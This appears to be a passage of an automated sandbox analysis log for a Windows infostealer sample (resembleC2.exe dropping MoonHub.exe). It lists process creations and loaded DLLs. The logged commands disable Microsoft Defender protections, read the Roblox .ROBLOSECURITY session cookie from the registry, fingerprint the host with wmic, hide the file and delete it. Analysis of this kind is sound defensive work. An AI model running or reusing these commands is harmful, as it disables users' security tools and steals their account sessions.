                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\AppData\Local\Temp\MoonHub.exe" && pause
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess created: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe "C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess created: C:\Users\user\AppData\Local\Temp\MoonHub.exe "C:\Users\user\AppData\Local\Temp\MoonHub.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\MoonHub.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe'Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\AppData\Local\Temp\MoonHub.exe" && pauseJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeSection loaded: actxprxy.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: devenum.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: devobj.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: msdmo.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
